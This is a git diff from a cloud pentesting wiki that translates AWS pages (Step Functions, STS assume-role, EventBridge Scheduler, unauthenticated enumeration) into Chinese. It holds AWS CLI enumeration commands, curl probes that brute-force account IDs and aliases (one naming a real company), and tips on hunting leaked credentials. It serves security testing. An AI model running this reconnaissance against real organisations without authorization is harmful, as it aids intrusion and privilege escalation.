+一个 **Choice** 状态为工作流添加条件逻辑,使其能够根据输入数据做出决策。它评估指定的条件,并根据结果转换到相应的状态。 -- **Comparison**: Each choice rule includes a comparison operator (e.g., **`NumericEquals`**, **`StringEquals`**) that compares an input variable to a specified value or another variable. -- **Next Field**: Choice states do not support don't support the **`End`** field, instead, they define the **`Next`** state to transition to if the comparison is true. - -Example of **Choice** state: +- **Comparison**: 每个选择规则包括一个比较运算符(例如,**`NumericEquals`**,**`StringEquals`**),用于将输入变量与指定值或另一个变量进行比较。 +- **Next Field**: Choice 状态不支持 **`End`** 字段,而是定义 **`Next`** 状态,以便在比较为真时进行转换。 +**Choice** 状态的示例: ```json { - "Variable": "$.timeStamp", - "TimestampEquals": "2000-01-01T00:00:00Z", - "Next": "TimeState" +"Variable": "$.timeStamp", +"TimestampEquals": "2000-01-01T00:00:00Z", +"Next": "TimeState" } ``` - ### Fail/Succeed -A **`Fail`** state stops the execution of a state machine and marks it as a failure. It is used to specify an error name and a cause, providing details about the failure. This state is terminal, meaning it ends the execution flow. +一个 **`Fail`** 状态停止状态机的执行并将其标记为失败。它用于指定错误名称和原因,提供有关失败的详细信息。此状态是终端状态,意味着它结束执行流程。 -A **`Succeed`** state stops the execution successfully. It is typically used to terminate the workflow when it completes successfully. This state does not require a **`Next`** field. +一个 **`Succeed`** 状态成功地停止执行。它通常用于在工作流成功完成时终止工作流。此状态不需要 **`Next`** 字段。 {{#tabs }} {{#tab name="Fail example" }} - ```json "FailState": { - "Type": "Fail", - "Error": "ErrorName", - "Cause": "Error details" +"Type": "Fail", +"Error": "ErrorName", +"Cause": "Error details" } ``` - {{#endtab }} -{{#tab name="Succeed example" }} - +{{#tab name="成功示例" }} ```json "SuccessState": { - "Type": "Succeed" +"Type": "Succeed" } ``` - {{#endtab }} {{#endtabs }} ### Pass -A **Pass** state passes its input to its output either without performing any work or transformin JSON state input using filters, and then passing the transformed data to the next state. It is useful for testing and constructing state machines, allowing you to inject static data or transform it. - +一个 **Pass** 状态将其输入传递给输出,既不执行任何工作,也不使用过滤器转换 JSON 状态输入,然后将转换后的数据传递给下一个状态。它对于测试和构建状态机非常有用,允许您注入静态数据或对其进行转换。 ```json "PassState": { - "Type": "Pass", - "Result": {"key": "value"}, - "ResultPath": "$.newField", - "Next": "NextState" +"Type": "Pass", +"Result": {"key": "value"}, +"ResultPath": "$.newField", +"Next": "NextState" +} +``` +### Wait + +一个 **Wait** 状态会延迟状态机的执行,直到指定的持续时间。配置等待时间的主要方法有三种: + +- **X Seconds**: 固定的等待秒数。 + +```json +"WaitState": { +"Type": "Wait", +"Seconds": 10, +"Next": "NextState" } ``` -### Wait +- **Absolute Timestamp**: 等待直到的确切时间。 -A **Wait** state delays the execution of the state machine for a specified duration. There are three primary methods to configure the wait time: +```json +"WaitState": { +"Type": "Wait", +"Timestamp": "2024-03-14T01:59:00Z", +"Next": "NextState" +} +``` -- **X Seconds**: A fixed number of seconds to wait. +- **Dynamic Wait**: 基于输入使用 **`SecondsPath`** 或 **`TimestampPath`**。 - ```json - "WaitState": { - "Type": "Wait", - "Seconds": 10, - "Next": "NextState" - } - ``` - -- **Absolute Timestamp**: An exact time to wait until. - - ```json - "WaitState": { - "Type": "Wait", - "Timestamp": "2024-03-14T01:59:00Z", - "Next": "NextState" - } - ``` - -- **Dynamic Wait**: Based on input using **`SecondsPath`** or **`TimestampPath`**. 
- - ```json - jsonCopiar código - "WaitState": { - "Type": "Wait", - "TimestampPath": "$.expirydate", - "Next": "NextState" - } - ``` +```json +jsonCopiar código +"WaitState": { +"Type": "Wait", +"TimestampPath": "$.expirydate", +"Next": "NextState" +} +``` ### Parallel -A **Parallel** state allows you to execute multiple branches of tasks concurrently within your workflow. Each branch runs independently and processes its own sequence of states. The execution waits until all branches complete before proceeding to the next state. Its key fields are: - -- **Branches**: An array defining the parallel execution paths. Each branch is a separate state machine. -- **ResultPath**: Defines where (in the input) to place the combined output of the branches. -- **Retry and Catch**: Error handling configurations for the parallel state. +一个 **Parallel** 状态允许您在工作流中并发执行多个任务分支。每个分支独立运行并处理自己的状态序列。执行会等待所有分支完成后再继续到下一个状态。其关键字段包括: +- **Branches**: 定义并行执行路径的数组。每个分支是一个单独的状态机。 +- **ResultPath**: 定义将分支的合并输出放置在输入中的位置。 +- **Retry and Catch**: 并行状态的错误处理配置。 ```json "ParallelState": { - "Type": "Parallel", - "Branches": [ - { - "StartAt": "Task1", - "States": { ... } - }, - { - "StartAt": "Task2", - "States": { ... } - } - ], - "Next": "NextState" +"Type": "Parallel", +"Branches": [ +{ +"StartAt": "Task1", +"States": { ... } +}, +{ +"StartAt": "Task2", +"States": { ... } +} +], +"Next": "NextState" +} +``` +### Map + +一个 **Map** 状态允许对数据集中的每个项目执行一组步骤。它用于数据的并行处理。根据您希望如何处理数据集中的项目,Step Functions 提供以下模式: + +- **Inline Mode**: 对每个 JSON 数组项执行一组状态的子集。适用于并行迭代少于 40 次的小规模任务,在包含 **`Map`** 状态的工作流上下文中运行每个任务。 + +```json +"MapState": { +"Type": "Map", +"ItemsPath": "$.arrayItems", +"ItemProcessor": { +"ProcessorConfig": { +"Mode": "INLINE" +}, +"StartAt": "AddState", +"States": { +"AddState": { +"Type": "Task", +"Resource": "arn:aws:states:::lambda:invoke", +"OutputPath": "$.Payload", +"Parameters": { +"FunctionName": "arn:aws:lambda:::function:add-function" +}, +"End": true +} +} +}, +"End": true +"ResultPath": "$.detail.added", +"ItemsPath": "$.added" } ``` -### Map +- **Distributed Mode**: 设计用于大规模并行处理,具有高并发性。支持处理大型数据集,例如存储在 Amazon S3 中的数据集,允许高达 10,000 个并行子工作流执行,这些子工作流作为单独的子执行运行。 -A **Map** state enables the execution of a set of steps for each item in an dataset. It's used for parallel processing of data. Depending on how you want to process the items of the dataset, Step Functions provides the following modes: - -- **Inline Mode**: Executes a subset of states for each JSON array item. Suitable for small-scale tasks with less than 40 parallel iterations, running each of them in the context of the workflow that contains the **`Map`** state. - - ```json - "MapState": { - "Type": "Map", - "ItemsPath": "$.arrayItems", - "ItemProcessor": { - "ProcessorConfig": { - "Mode": "INLINE" - }, - "StartAt": "AddState", - "States": { - "AddState": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "OutputPath": "$.Payload", - "Parameters": { - "FunctionName": "arn:aws:lambda:::function:add-function" - }, - "End": true - } - } - }, - "End": true - "ResultPath": "$.detail.added", - "ItemsPath": "$.added" - } - ``` - -- **Distributed Mode**: Designed for large-scale parallel processing with high concurrency. Supports processing large datasets, such as those stored in Amazon S3, enabling a high concurrency of up 10,000 parallel child workflow executions, running these child as a separate child execution. 
- - ```json - "DistributedMapState": { - "Type": "Map", - "ItemReader": { - "Resource": "arn:aws:states:::s3:getObject", - "Parameters": { - "Bucket": "my-bucket", - "Key": "data.csv" - } - }, - "ItemProcessor": { - "ProcessorConfig": { - "Mode": "DISTRIBUTED", - "ExecutionType": "EXPRESS" - }, - "StartAt": "ProcessItem", - "States": { - "ProcessItem": { - "Type": "Task", - "Resource": "arn:aws:lambda:region:account-id:function:my-function", - "End": true - } - } - }, - "End": true - "ResultWriter": { - "Resource": "arn:aws:states:::s3:putObject", - "Parameters": { - "Bucket": "myOutputBucket", - "Prefix": "csvProcessJobs" - } - } - } - ``` +```json +"DistributedMapState": { +"Type": "Map", +"ItemReader": { +"Resource": "arn:aws:states:::s3:getObject", +"Parameters": { +"Bucket": "my-bucket", +"Key": "data.csv" +} +}, +"ItemProcessor": { +"ProcessorConfig": { +"Mode": "DISTRIBUTED", +"ExecutionType": "EXPRESS" +}, +"StartAt": "ProcessItem", +"States": { +"ProcessItem": { +"Type": "Task", +"Resource": "arn:aws:lambda:region:account-id:function:my-function", +"End": true +} +} +}, +"End": true +"ResultWriter": { +"Resource": "arn:aws:states:::s3:putObject", +"Parameters": { +"Bucket": "myOutputBucket", +"Prefix": "csvProcessJobs" +} +} +} +``` ### Versions and aliases -Step Functions also lets you manage workflow deployments through **versions** and **aliases** of state machines. A version represents a snapshot of a state machine that can be executed. Aliases serve as pointers to up to two versions of a state machine. +Step Functions 还允许您通过状态机的 **versions** 和 **aliases** 管理工作流部署。版本表示可以执行的状态机快照。别名作为指向最多两个版本的状态机的指针。 -- **Versions**: These immutable snapshots of a state machine are created from the most recent revision of that state machine. Each version is identified by a unique ARN that combines the state machine ARN with the version number, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Versions cannot be edited, but you can update the state machine and publish a new version, or use the desired state machine version. -- **Aliases**: These pointers can reference up to two versions of the same state machine. Multiple aliases can be created for a single state machine, each identified by a unique ARN constructed by combining the state machine ARN with the alias name, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Aliases enable routing of traffic between one of the two versions of a state machine. Alternatively, an alias can point to a single specific version of the state machine, but not to other aliases. They can be updated to redirect to a different version of the state machine as needed, facilitating controlled deployments and workflow management. +- **Versions**: 这些不可变的状态机快照是从该状态机的最新修订版创建的。每个版本由一个唯一的 ARN 标识,该 ARN 将状态机 ARN 与版本号组合,用冒号分隔(**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**)。版本不能被编辑,但您可以更新状态机并发布新版本,或使用所需的状态机版本。 +- **Aliases**: 这些指针可以引用同一状态机的最多两个版本。可以为单个状态机创建多个别名,每个别名由一个唯一的 ARN 标识,该 ARN 通过将状态机 ARN 与别名名称组合,用冒号分隔(**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**)。别名使得在状态机的两个版本之间路由流量成为可能。或者,别名可以指向状态机的单个特定版本,但不能指向其他别名。它们可以根据需要更新以重定向到状态机的不同版本,从而促进受控部署和工作流管理。 -For more detailed information about **ASL**, check: [**Amazon States Language**](https://states-language.net/spec.html). 
+有关 **ASL** 的更多详细信息,请查看:[**Amazon States Language**](https://states-language.net/spec.html)。 ## IAM Roles for State machines -AWS Step Functions utilizes AWS Identity and Access Management (IAM) roles to control access to resources and actions within state machines. Here are the key aspects related to security and IAM roles in AWS Step Functions: +AWS Step Functions 利用 AWS 身份和访问管理 (IAM) 角色来控制对状态机内资源和操作的访问。以下是与 AWS Step Functions 中的安全性和 IAM 角色相关的关键方面: -- **Execution Role**: Each state machine in AWS Step Functions is associated with an IAM execution role. This role defines what actions the state machine can perform on your behalf. When a state machine transitions between states that interact with AWS services (like invoking Lambda functions, accessing DynamoDB, etc.), it assumes this execution role to carry out those actions. -- **Permissions**: The IAM execution role must be configured with permissions that allow the necessary actions on other AWS services. For example, if your state machine needs to invoke AWS Lambda functions, the IAM role must have **`lambda:InvokeFunction`** permissions. Similarly, if it needs to write to DynamoDB, appropriate permissions (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, etc.) must be granted. +- **Execution Role**: AWS Step Functions 中的每个状态机都与一个 IAM 执行角色相关联。该角色定义了状态机可以代表您执行的操作。当状态机在与 AWS 服务交互的状态之间转换时(例如调用 Lambda 函数、访问 DynamoDB 等),它会假定此执行角色以执行这些操作。 +- **Permissions**: IAM 执行角色必须配置具有允许对其他 AWS 服务执行必要操作的权限。例如,如果您的状态机需要调用 AWS Lambda 函数,则 IAM 角色必须具有 **`lambda:InvokeFunction`** 权限。同样,如果它需要写入 DynamoDB,则必须授予适当的权限(**`dynamodb:PutItem`**、**`dynamodb:UpdateItem`** 等)。 ## Enumeration -ReadOnlyAccess policy is enough for all the following enumeration actions. - +ReadOnlyAccess 策略足以满足所有以下枚举操作。 ```bash # State machines # @@ -310,10 +297,9 @@ aws stepfunctions describe-map-run --map-run-arn ## Lists executions of a Map Run aws stepfunctions list-executions --map-run-arn [--status-filter ] [--redrive-filter ] ``` - ## Privesc -In the following page, you can check how to **abuse Step Functions permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用 Step Functions 权限以提升特权**: {{#ref}} ../aws-privilege-escalation/aws-stepfunctions-privesc.md @@ -338,7 +324,3 @@ In the following page, you can check how to **abuse Step Functions permissions t - [https://states-language.net/spec.html](https://states-language.net/spec.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md index 385d55c3b..4e6f67c7e 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md @@ -4,62 +4,57 @@ ## STS -**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users). +**AWS安全令牌服务(STS)**主要用于发放**临时、有限权限的凭证**。这些凭证可以为**AWS身份与访问管理(IAM)**用户或经过身份验证的用户(联合用户)请求。 -Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options. 
+鉴于STS的目的是**发放身份冒充的凭证**,该服务对于**提升权限和维持持久性**极为重要,尽管它可能没有广泛的选项。

-### Assume Role Impersonation
+### 假设角色冒充

-The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN.
+AWS STS提供的[AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html)操作至关重要,因为它允许一个主体获取另一个主体的凭证,实质上冒充他们。调用时,它会返回一个访问密钥ID、一个秘密密钥和一个与指定ARN对应的会话令牌。

-For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard.
+对于渗透测试人员或红队成员来说,这种技术对于权限提升至关重要(如[**这里**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)所述)。然而,值得注意的是,这种技术相当显眼,可能不会让攻击者感到意外。

-#### Assume Role Logic
-
-In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in:
+#### 假设角色逻辑
+如果**要承担的角色明确允许了特定的角色 ARN**(如下例所示),就可以在同一账户中承担该角色:
```json
{
-    "Version": "2012-10-17",
-    "Statement": [
-        {
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam:::role/priv-role"
-            },
-            "Action": "sts:AssumeRole",
-            "Condition": {}
-        }
-    ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam:::role/priv-role"
+},
+"Action": "sts:AssumeRole",
+"Condition": {}
+}
+]
}
```
+在这种情况下,角色 **`priv-role`** **不需要被特别允许** 来承担该角色(只需有该允许即可)。

-The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough).
-
-However, if a role is allowing an account to assume it, like in:
+但是,如果一个角色允许的是一个账户来承担它,例如:
```json
{
-    "Version": "2012-10-17",
-    "Statement": [
-        {
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam:::root"
-            },
-            "Action": "sts:AssumeRole",
-            "Condition": {}
-        }
-    ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam:::root"
+},
+"Action": "sts:AssumeRole",
+"Condition": {}
+}
+]
}
```
+那么尝试承担该角色的角色,就需要对该角色拥有**特定的 `sts:AssumeRole` 权限**,才能**承担它**。

-The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**.
-
-If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN).
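下面是一个示意性的组合示例(其中的角色名、账户 ID 和策略名称均为假设的占位符,并非本文固定内容):先为尝试承担角色的一方附加所需的 `sts:AssumeRole` 身份策略,再调用 `assume-role` 获取临时凭证:
```bash
# 示意:为调用方角色附加允许承担目标角色的内联策略(所有名称均为占位符)
aws iam put-role-policy --role-name <caller-role> \
  --policy-name allow-assume-target \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Action": "sts:AssumeRole",
      "Resource": "arn:aws:iam::<target-account-id>:role/<target-role>"
    }]
  }'

# 随后即可尝试(跨账户)承担该角色,获取临时凭证
aws sts assume-role \
  --role-arn "arn:aws:iam::<target-account-id>:role/<target-role>" \
  --role-session-name test-session
```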
+如果您尝试从 **不同的账户** 假设一个 **角色**,则 **被假设的角色必须允许它**(指明角色的 **ARN** 或 **外部账户**),并且 **尝试假设** 另一个角色的 **角色必须** 具备 **假设它的权限**(在这种情况下,即使被假设的角色指定了 ARN,这也不是可选的)。 ### Enumeration - ```bash # Get basic info of the creds aws sts get-caller-identity @@ -72,33 +67,28 @@ aws sts get-session-token ## MFA aws sts get-session-token --serial-number --token-code ``` +### 提权 -### Privesc - -In the following page you can check how to **abuse STS permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用 STS 权限以提升权限**: {{#ref}} ../aws-privilege-escalation/aws-sts-privesc.md {{#endref}} -### Post Exploitation +### 后期利用 {{#ref}} ../aws-post-exploitation/aws-sts-post-exploitation.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-sts-persistence.md {{#endref}} -## References +## 参考 - [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md index a2f2e0c2f..1264b748c 100644 --- a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md @@ -6,49 +6,48 @@ ## EventBridge Scheduler -**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets. +**Amazon EventBridge Scheduler** 是一个完全托管的 **无服务器调度程序,旨在大规模创建、运行和管理任务**。它使您能够在超过 270 个 AWS 服务和 6,000 多个 API 操作中调度数百万个任务,所有这些都来自一个中央服务。凭借内置的可靠性和无需管理的基础设施,EventBridge Scheduler 简化了调度,降低了维护成本,并自动扩展以满足需求。您可以为重复调度配置 cron 或速率表达式,设置一次性调用,并定义灵活的交付窗口和重试选项,确保任务根据下游目标的可用性可靠交付。 -There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed." +每个区域每个账户的初始调度限制为 1,000,000。甚至官方配额页面也建议:“建议在一次性调度完成后将其删除。” ### Types of Schedules -Types of Schedules in EventBridge Scheduler: +EventBridge Scheduler 中的调度类型: -1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC. -2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours. -3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM. +1. **一次性调度** – 在特定时间执行任务,例如,12 月 21 日 UTC 时间上午 7 点。 +2. **基于速率的调度** – 根据频率设置重复任务,例如,每 2 小时一次。 +3. **基于 cron 的调度** – 使用 cron 表达式设置重复任务,例如,每周五下午 4 点。 -Two Mechanisms for Handling Failed Events: +处理失败事件的两种机制: -1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure. -2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. 
DLQs help in troubleshooting issues with your schedule or its downstream target. +1. **重试策略** – 定义失败事件的重试尝试次数以及在将其视为失败之前保持未处理的时间。 +2. **死信队列 (DLQ)** – 标准的 Amazon SQS 队列,在重试耗尽后将失败事件传递到此队列。DLQ 有助于排查调度或其下游目标的问题。 ### Targets -There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API. +调度程序有 2 种类型的目标 [**模板化 (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html),这些目标常用且 AWS 使其更易于配置,以及 [**通用 (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html),可用于调用任何 AWS API。 -**Templated targets** support the following services: +**模板化目标** 支持以下服务: - CodeBuild – StartBuild - CodePipeline – StartPipelineExecution - Amazon ECS – RunTask - - Parameters: EcsParameters +- Parameters: EcsParameters - EventBridge – PutEvents - - Parameters: EventBridgeParameters +- Parameters: EventBridgeParameters - Amazon Inspector – StartAssessmentRun - Kinesis – PutRecord - - Parameters: KinesisParameters +- Parameters: KinesisParameters - Firehose – PutRecord - Lambda – Invoke - SageMaker – StartPipelineExecution - - Parameters: SageMakerPipelineParameters +- Parameters: SageMakerPipelineParameters - Amazon SNS – Publish - Amazon SQS – SendMessage - - Parameters: SqsParameters +- Parameters: SqsParameters - Step Functions – StartExecution ### Enumeration - ```bash # List all EventBridge Scheduler schedules aws scheduler list-schedules @@ -65,10 +64,9 @@ aws scheduler get-schedule-group --name # List tags for a specific schedule (helpful in identifying any custom tags or permissions) aws scheduler list-tags-for-resource --resource-arn ``` - ### Privesc -In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用 eventbridge 调度程序权限以提升权限**: {{#ref}} ../aws-privilege-escalation/eventbridgescheduler-privesc.md @@ -79,7 +77,3 @@ In the following page, you can check how to **abuse eventbridge scheduler permis - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md index 0003290b4..adb20e419 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md @@ -1,58 +1,54 @@ -# AWS - Unauthenticated Enum & Access +# AWS - 未认证枚举与访问 {{#include ../../../banners/hacktricks-training.md}} -## AWS Credentials Leaks +## AWS 凭证泄露 -A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... 
or in any other part you think you might find any information about the company and its cloud infa.\ -Some useful **tools**: +获取 AWS 账户访问或信息的常见方法是通过 **搜索泄露**。您可以使用 **google dorks** 搜索泄露,检查 **组织** 和 **组织员工** 在 **Github** 或其他平台上的 **公共仓库**,在 **凭证泄露数据库** 中搜索……或在您认为可能找到公司及其云基础设施信息的任何其他地方。\ +一些有用的 **工具**: - [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos) - [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos) - [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks) -## AWS Unauthenticated Enum & Access +## AWS 未认证枚举与访问 -There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. Check here how: +AWS 中有几个服务可以配置,使其对所有互联网用户或比预期更多的人开放访问。查看以下内容了解如何: -- [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md) -- [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) -- [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md) -- [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) -- [**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md) -- [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md) -- [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md) -- [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md) -- [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md) -- [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md) -- [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md) -- [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md) -- [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md) -- [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md) -- [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md) -- [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md) -- [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md) -- [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md) +- [**账户未认证枚举**](aws-accounts-unauthenticated-enum.md) +- [**Cloud9 未认证枚举**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) +- [**Cloudfront 未认证枚举**](aws-cloudfront-unauthenticated-enum.md) +- [**Cloudsearch 未认证枚举**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) +- [**Cognito 未认证枚举**](aws-cognito-unauthenticated-enum.md) +- [**DocumentDB 未认证枚举**](aws-documentdb-enum.md) +- [**EC2 未认证枚举**](aws-ec2-unauthenticated-enum.md) +- [**Elasticsearch 未认证枚举**](aws-elasticsearch-unauthenticated-enum.md) +- [**IAM 未认证枚举**](aws-iam-and-sts-unauthenticated-enum.md) +- [**IoT 未认证访问**](aws-iot-unauthenticated-enum.md) +- [**Kinesis Video 未认证访问**](aws-kinesis-video-unauthenticated-enum.md) +- [**Media 未认证访问**](aws-media-unauthenticated-enum.md) +- [**MQ 未认证访问**](aws-mq-unauthenticated-enum.md) +- [**MSK 未认证访问**](aws-msk-unauthenticated-enum.md) +- [**RDS 未认证访问**](aws-rds-unauthenticated-enum.md) +- [**Redshift 未认证访问**](aws-redshift-unauthenticated-enum.md) +- [**SQS 
未认证访问**](aws-sqs-unauthenticated-enum.md) +- [**S3 未认证访问**](aws-s3-unauthenticated-enum.md) -## Cross Account Attacks +## 跨账户攻击 -In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed. +在演讲 [**打破隔离:跨账户 AWS 漏洞**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) 中,展示了一些服务如何允许任何 AWS 账户访问它们,因为 **未指定账户 ID 的 AWS 服务** 是被允许的。 -During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**: +在演讲中,他们列举了几个例子,例如 S3 存储桶 **允许 cloudtrail**(来自 **任何 AWS** 账户)**写入它们**: ![](<../../../images/image (260).png>) -Other services found vulnerable: +其他发现存在漏洞的服务: - AWS Config - Serverless repository -## Tools +## 工具 -- [**cloud_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.) +- [**cloud_enum**](https://github.com/initstring/cloud_enum):多云 OSINT 工具。**查找公共资源** 在 AWS、Azure 和 Google Cloud。支持的 AWS 服务:开放/受保护的 S3 存储桶,awsapps(WorkMail、WorkDocs、Connect 等) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md index 84c70ed0e..49fb47b42 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md @@ -2,14 +2,13 @@ {{#include ../../../banners/hacktricks-training.md}} -## Account IDs +## 账户 ID -If you have a target there are ways to try to identify account IDs of accounts related to the target. +如果你有一个目标,有一些方法可以尝试识别与该目标相关的账户 ID。 -### Brute-Force - -You create a list of potential account IDs and aliases and check them +### 暴力破解 +你创建一个潜在账户 ID 和别名的列表并进行检查。 ```bash # Check if an account ID exists curl -v https://.signin.aws.amazon.com @@ -17,33 +16,28 @@ curl -v https://.signin.aws.amazon.com ## It also works from account aliases curl -v https://vodafone-uk2.signin.aws.amazon.com ``` - -You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py). +您可以 [使用此工具自动化此过程](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py)。 ### OSINT -Look for urls that contains `.signin.aws.amazon.com` with an **alias related to the organization**. +查找包含 `.signin.aws.amazon.com` 